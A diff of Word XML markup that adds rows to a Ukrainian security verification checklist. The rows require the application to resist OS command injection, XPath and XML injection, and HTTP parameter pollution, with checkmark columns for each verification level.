+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17507,11 +19687,21 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="540" w:type="dxa"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>4.7</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17542,11 +19732,217 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Переконайтеся в тому, що програма не сприйнятливий до </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>OS</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Command</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Injection</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>, або що контроль безпеки запобіг</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ає</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>OS</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Command</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Injection</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="F79646" w:themeFill="accent6"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="553" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17577,13 +19973,21 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="738" w:type="dxa"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>4.8</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17622,13 +20026,169 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>4.6</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="7110" w:type="dxa"/>
+              <w:t xml:space="preserve">Переконайтеся </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>в тому, що програма не вразлива</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> до </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>звичайних атак</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>XML</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, такі як </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>XPath</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> фальсифікація запитів і XML ін</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>’</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>єкцій.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="F79646" w:themeFill="accent6"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17656,7 +20216,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
             <w:r>
@@ -17665,105 +20225,15 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся в тому, що програма не сприйнятливий до </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>LDAP</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> ін'єкцій, а</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>бо що контроль безпеки запобі</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>гає</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>LDAP</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> ін'єкці</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>ї</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="630" w:type="dxa"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>4.9</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17791,14 +20261,135 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="540" w:type="dxa"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Переконайтеся, що програма має захист від атак забруднення параметрів </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>HTTP</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, особливо якщо </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t xml:space="preserve">фреймворк не </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>розрізняє</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> джерело параметрів запиту (</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>GET</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>POST</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>cookies</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>, заголовки, навколишнього середовища і т.д.)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17826,14 +20417,52 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
             <w:tcW w:w="553" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17861,16 +20490,25 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="738" w:type="dxa"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
